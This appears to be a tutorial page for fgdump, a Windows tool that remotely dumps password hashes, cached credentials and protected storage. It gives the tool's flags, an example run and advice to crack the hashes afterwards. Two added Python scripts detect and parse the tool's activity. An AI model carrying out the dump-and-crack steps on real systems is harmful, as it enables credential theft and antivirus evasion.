The Web Local
Fgdump

 

Fgdump is a utility for dumping password hashes on Windows NT/2000/XP/2003/Vista machines. It has all the functionality of pwdump built in and can also do a number of other useful things, such as grabbing cached credentials, executing a remote executable and dumping the protected storage on a remote (or local) host. Users of pwdump are advised to upgrade to this as soon as possible.

 

Fgdump comes with a number of add-ons:

 

  • fgexec: remotely installed service that can run a remote executable. (This is a little limited)
  • pwdump6: An updated version of pwdump3e.
  • pstgdump: A protected storage dumper. (IE, Outlook Express passwords etc.).

 

In essence, fgdump carries out the following steps when grabbing passwords from a remote machine:

 

  • Bind to a remote machine/target list using IPC$,
  • Stop AV, if it is installed,
  • Locate file shares exposed on that machine,
  • Find a writable share from the above list, bind it to a local drive,
  • Upload fgexec and cachedump,
  • Run pwdump (password history dump included),
  • Run cachedump,
  • Run pstgdump,
  • Delete uploaded files from the file share,
  • Unbind the remote file share,
  • Restart AV if it was running,
  • Unbind from IPC$.

 

Note: The current release may have issues if another copy of pwdump and lsaext.dll is present on the system; it is best to delete these files. If older versions of the executable/DLL are found, fgdump may use them and possibly cause the target system(s) to crash.
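The step list above maps onto host and network events a defender can look for: a connection to IPC$, an antivirus service stopping, executables being written to an administrative share, a service being installed, the uploaded files being deleted again and the AV service restarting. The Python script below is an added example, not part of the original page and not fgdump's own code: it correlates those stages per (source, target host) pair inside a time window and raises an alert when several of them occur together. The log lines, their key=value layout and the AV service-name hints are constructed for the example; in a real deployment the stages would be mapped from Windows Security and System log events (for instance 5145 for share object access, 7036 for service state changes and 7045 for service installation).

```python
"""Correlate the stages of a remote hash-dump run into one alert per source/target pair."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not taken from the page or produced by fgdump).
# Format: ISO timestamp followed by key=value pairs.
SAMPLE_LOG = """\
2006-09-26T15:20:01 type=share_access src=10.0.0.5 host=SRV01 share=IPC$ object=-
2006-09-26T15:20:02 type=service_stop src=10.0.0.5 host=SRV01 service=McShield
2006-09-26T15:20:03 type=share_access src=10.0.0.5 host=SRV01 share=ADMIN$ object=fgexec.exe
2006-09-26T15:20:03 type=share_access src=10.0.0.5 host=SRV01 share=ADMIN$ object=cachedump.exe
2006-09-26T15:20:04 type=service_install src=10.0.0.5 host=SRV01 service=fgexec
2006-09-26T15:20:09 type=file_delete src=10.0.0.5 host=SRV01 object=fgexec.exe
2006-09-26T15:20:10 type=service_start src=10.0.0.5 host=SRV01 service=McShield
2006-09-26T15:25:00 type=share_access src=10.0.0.9 host=SRV02 share=IPC$ object=-
2006-09-26T15:25:30 type=share_access src=10.0.0.9 host=SRV02 share=public object=report.doc
"""

# Assumed, illustrative substrings that identify AV service names; extend for your estate.
AV_SERVICE_HINTS = ("mcshield", "antivirus", "symantec", "defend")
ADMIN_SHARES = {"ADMIN$", "C$", "D$"}
TOOL_SUFFIXES = (".exe", ".dll")

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Parse one 'timestamp key=value ...' line into a dict with a datetime under 'ts'."""
    ts, _, rest = line.partition(" ")
    event = dict(KV_RE.findall(rest))
    event["ts"] = datetime.fromisoformat(ts)
    return event


def stage_of(event):
    """Map a single event to the stage of the dump sequence it matches, or None."""
    etype = event.get("type")
    service = event.get("service", "").lower()
    obj = event.get("object", "").lower()
    is_av = any(hint in service for hint in AV_SERVICE_HINTS)
    if etype == "share_access" and event.get("share") == "IPC$":
        return "ipc_bind"
    if etype == "service_stop" and is_av:
        return "av_stopped"
    if etype == "share_access" and event.get("share") in ADMIN_SHARES and obj.endswith(TOOL_SUFFIXES):
        return "tool_upload"
    if etype == "service_install":
        return "service_install"
    if etype == "file_delete" and obj.endswith(TOOL_SUFFIXES):
        return "tool_cleanup"
    if etype == "service_start" and is_av:
        return "av_restarted"
    return None


def correlate(log_text, window=timedelta(minutes=10)):
    """Return {(src, host): sorted stage names} for the densest `window` seen per pair."""
    seen = defaultdict(list)  # (src, host) -> [(ts, stage)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        stage = stage_of(event)
        if stage:
            seen[(event["src"], event["host"])].append((event["ts"], stage))
    result = {}
    for key, items in seen.items():
        items.sort()
        best = set()
        # Sliding window anchored at each event: keep the largest set of distinct stages.
        for i, (t0, _) in enumerate(items):
            stages = {stage for ts, stage in items[i:] if ts - t0 <= window}
            if len(stages) > len(best):
                best = stages
        result[key] = sorted(best)
    return result


def alerts(log_text, min_stages=3):
    """Pairs that show at least `min_stages` distinct stages of the sequence within the window."""
    return [(src, host, stages)
            for (src, host), stages in correlate(log_text).items()
            if len(stages) >= min_stages]


if __name__ == "__main__":
    for src, host, stages in alerts(SAMPLE_LOG):
        print(f"ALERT {src} -> {host}: {', '.join(stages)}")
```

Run against the sample, only the 10.0.0.5 to SRV01 pair is reported, with all six stages; SRV02 shows a lone IPC$ connection, which on its own is normal administrative traffic and stays below the threshold. The threshold and window are the tuning knobs: an AV stop followed by a service install from a remote source is already worth a look, so lowering `min_stages` to 2 for those two stages is a reasonable variation.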

 

Installation:

 

Download the executable from here.

Extract the zip file; that's it.

 

Execution:

 

fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename}

 

Note: The username and password must be administrator credentials on the target.

 

   -t           Tests for the presence of antivirus without actually running the password dumps
   -c           Forces fgdump to skip the cache dump
   -w           Forces fgdump to skip the password dump
   -s           Forces fgdump to skip the protected storage dump
   -r           Makes fgdump ignore existing pwdump/cachedump files (default: skip a host if they already exist)
   -v           Verbose output. Use twice for greater effect
   -k           Keeps the pwdump/cachedump going even if antivirus is in an unknown state
   -l logfile   Logs all output to logfile
   -T threads   Runs fgdump with the specified number of parallel threads
   -h Host      Name of the single host to perform the dumps against
   -f filename  Reads hosts from a line-separated file
   -H filename  Reads host:username:password from a line-separated file (per-host credentials)

 

Example Output:

 

C:\fgdump-1.5.2\Release>fgdump.exe -u hacker -p hard_password -c -f target.txt
 

fgDump 1.5.2 - fizzgig and the mighty group at foofus.net ****** Written to make j0m0kun's life just a bit easier
Copyright(C) 2006 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information.

** Beginning dump on server 192.168.1.17 **
OS (192.168.1.17): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

** Beginning dump on server 192.168.1.18 **
OS (192.168.1.18): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage


** Beginning dump on server 192.168.1.124 **
OS (192.168.1.124): Microsoft Windows 2000 Server Service Pack 4 (Build 2195)
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

Failed servers:

Successful servers:
192.168.1.17
192.168.1.18
192.168.1.124

Total failed: 0
Total successful: 3


C:\fgdump-1.3.2-BETA\Release>dir

26/09/2006 15:20 230 192.168.1.124.cachedump
26/09/2006 15:20 514 192.168.1.124.pwdump
26/09/2006 15:37 605 192.168.1.17.pwdump
26/09/2006 15:37 697 192.168.1.18.pwdump
11/07/2006 15:16 569,344 fgdump.exe
26/09/2006 15:37 64 target.txt
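The run output above is worth reading line by line rather than trusting the closing summary: every host is listed as "successful", yet protected storage failed on all three (LogonUser error 1385 is ERROR_LOGON_TYPE_NOT_GRANTED, the account lacks the required logon right on the target), and 192.168.1.124 never printed "Passwords dumped successfully" at all. The Python parser below is an added example, not part of the original page and not fgdump's own code; it turns the per-host blocks into structured records so that partial results are visible, which is useful both when reviewing an assessment and when an incident responder recovers such output from a compromised machine. The embedded sample is the page's example output reproduced verbatim.

```python
"""Parse fgdump console output into per-host records and classify each host's result."""
import re
from dataclasses import dataclass, field

# Reproduced from the example output on this page (the per-host blocks and the summary).
SAMPLE_OUTPUT = """\
** Beginning dump on server 192.168.1.17 **
OS (192.168.1.17): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

** Beginning dump on server 192.168.1.18 **
OS (192.168.1.18): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

** Beginning dump on server 192.168.1.124 **
OS (192.168.1.124): Microsoft Windows 2000 Server Service Pack 4 (Build 2195)
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

Failed servers:

Successful servers:
192.168.1.17
192.168.1.18
192.168.1.124

Total failed: 0
Total successful: 3
"""

HEADER_RE = re.compile(r"^\*\* Beginning dump on server (\S+) \*\*$")
OS_RE = re.compile(r"^OS \((\S+)\): (.+)$")
ERR_RE = re.compile(r"error (\d+)")


@dataclass
class HostResult:
    host: str
    os: str = ""
    passwords_dumped: bool = False   # "Passwords dumped successfully" was printed
    pstore_failed: bool = False      # any "Failed to dump protected storage" line
    errors: list = field(default_factory=list)  # Win32 error codes seen in the block


def parse_fgdump_output(text):
    """Return {host: HostResult} built from the '** Beginning dump on server ... **' blocks."""
    results = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            current = results.setdefault(m.group(1), HostResult(host=m.group(1)))
            continue
        if line.startswith("Failed servers:") or line.startswith("Successful servers:"):
            current = None  # the summary section carries no per-host detail
            continue
        if current is None:
            continue
        m = OS_RE.match(line)
        if m:
            current.os = m.group(2)
        elif line == "Passwords dumped successfully":
            current.passwords_dumped = True
        elif line.startswith("Failed to dump protected storage"):
            current.pstore_failed = True
        m = ERR_RE.search(line)
        if m:
            current.errors.append(int(m.group(1)))
    return results


def summarize(results):
    """Classify each host: 'complete', 'partial' (hashes but no protected storage), 'unconfirmed'."""
    summary = {}
    for host, r in results.items():
        if r.passwords_dumped and not r.pstore_failed:
            summary[host] = "complete"
        elif r.passwords_dumped:
            summary[host] = "partial"
        else:
            summary[host] = "unconfirmed"
    return summary


if __name__ == "__main__":
    for host, status in summarize(parse_fgdump_output(SAMPLE_OUTPUT)).items():
        print(f"{host:15} {status}")
```

For the page's output this yields "partial" for 192.168.1.17 and 192.168.1.18 and "unconfirmed" for 192.168.1.124, a more honest picture than "Total successful: 3". The parser keys on the exact strings fgdump prints in this version; other releases may word the lines differently, so the regular expressions are the part to adjust.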

 

The next step would be to import the pwdump file (192.168.1.124.pwdump etc.) into a program like L0phtcrack and start your attack against the hashes.